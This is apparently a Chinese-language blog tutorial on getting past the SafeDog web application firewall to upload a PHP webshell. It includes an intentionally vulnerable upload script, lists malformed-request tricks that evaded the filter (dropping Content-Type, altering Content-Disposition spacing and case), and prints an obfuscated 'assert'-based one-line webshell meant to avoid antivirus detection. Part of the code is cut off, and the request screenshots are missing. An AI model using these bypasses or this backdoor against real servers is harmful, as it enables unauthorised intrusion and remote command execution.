这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的办法。
思路是：修正HTTP恳求，构成变形HTTP恳求，然后绕过网站安全狗的检测。
废话不多说，切入正题。。。。
1、试验环境：
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码：
 $path = dirname(__FILE__) . '/upload/';
 $rand = rand(0,30);
 move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
 echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "";
 echo "OK";
?>
由于此次试验的意图是绕过网站安全狗，所以PHP源码上我没做任何检测，把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP恳求：

 
很明显，文件名为”yijuhua.php”被阻拦。。。。
4、测验%00切断：

 
很明显，失利了。。。
5、修正HTTP恳求，结构变形HTTP恳求
(1)删去实体里边的Conten-Type字段：


绕过网站安全狗的阻拦，成功上传WebShell。。。
(2)删去Content-Disposition字段里的空格：

 


 
(3)修正Content-Disposition字段值的大小写：

 
6、菜刀衔接一句话：

 
到此，上传WebShell完毕，各位看理解了吗？
7、免杀PHP一句话：
 /*
 PHP一句话木马
 assert($string)
 */
 $arr = array('a','s','s','e','r','t');
 $func = '';
 for($i=0;$i
 $func .= $func . $arr[$i];
 }
 $func($_REQUEST['c']);
?>

 
8、修正缝隙：
呈现这种状况，我认为是网站安全狗在开发时没有考虑到变形HTTP恳求，而Apache却兼容变形HTTP恳求，所以可以上传成功。